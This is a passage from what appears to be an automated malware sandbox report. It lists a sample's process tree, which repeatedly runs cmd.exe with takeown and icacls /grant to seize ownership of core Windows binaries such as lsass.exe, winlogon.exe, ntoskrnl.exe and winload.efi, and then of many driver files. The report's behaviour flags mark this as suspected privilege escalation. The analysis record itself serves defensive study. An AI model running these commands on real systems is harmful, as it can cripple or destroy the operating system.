C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:1452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:1668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:1468
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:2948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:1824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:2924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:2780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:1140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"3⤵PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:2796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"3⤵PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:3032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:2124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:2692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"3⤵PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:1788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:3092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"3⤵PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:2224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵
- Possible privilege escalation attempt
PID:3100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:3120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:2492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵PID:3172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:2604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:2692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵PID:3308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:3156
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵PID:3324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:3204
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:3360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"3⤵PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:3252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:3368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"3⤵PID:3424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:3316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵
- Modifies file permissions
PID:3448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:3376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵PID:3496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:3400
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵
- Modifies file permissions
PID:3504
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"3⤵PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:3456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵PID:3580
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵PID:3616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:3520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵
- Possible privilege escalation attempt
PID:3632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"3⤵PID:3676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:3544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"3⤵PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit2⤵PID:3608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arc.sys3⤵PID:3784
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"3⤵PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:3644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵PID:3736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:3684
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:3776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit2⤵PID:3808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ataport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit2⤵PID:3860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\b57nd60a.sys3⤵PID:3996
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"3⤵PID:4036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:3912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵PID:4012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"3⤵PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:3952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bg4ldl2nv9195q.sys && icacls C:\Windows\System32\drivers\bg4ldl2nv9195q.sys /grant "%username%:F" && exit2⤵PID:4004
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bg4ldl2nv9195q.sys3⤵
- Modifies file permissions
PID:4088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bg4ldl2nv9195q.sys /grant "Admin:F"3⤵PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit2⤵PID:4044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\blbdrive.sys3⤵PID:2292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:4080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit2⤵PID:2244
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltLo.sys3⤵PID:3188
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit2⤵PID:704
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltUp.sys3⤵PID:3300
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:3116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit2⤵PID:2364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerId.sys3⤵
- Possible privilege escalation attempt
PID:2272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"3⤵PID:3248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit2⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerWdm.sys3⤵PID:3428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"3⤵PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit2⤵PID:2656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbMdm.sys3⤵
- Modifies file permissions
PID:3512
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit2⤵PID:3364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbSer.sys3⤵PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"3⤵PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:3412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵PID:3496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"3⤵PID:3392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:3264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵PID:3576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"3⤵PID:3668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:3540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"3⤵PID:3824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:3564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:3408
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:3596
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:3692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:3812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:3672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"3⤵PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit2⤵PID:3884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmdide.sys3⤵PID:3980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"3⤵PID:4036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:3816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"3⤵PID:3940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit2⤵PID:3904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\compbatt.sys3⤵PID:4020
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"3⤵PID:3124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit2⤵PID:3780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CompositeBus.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:3864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit2⤵PID:4088
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crcdisk.sys3⤵
- Possible privilege escalation attempt
PID:592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:3172
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:2720
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"3⤵PID:112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit2⤵PID:4084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\discache.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:3312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:3212
-
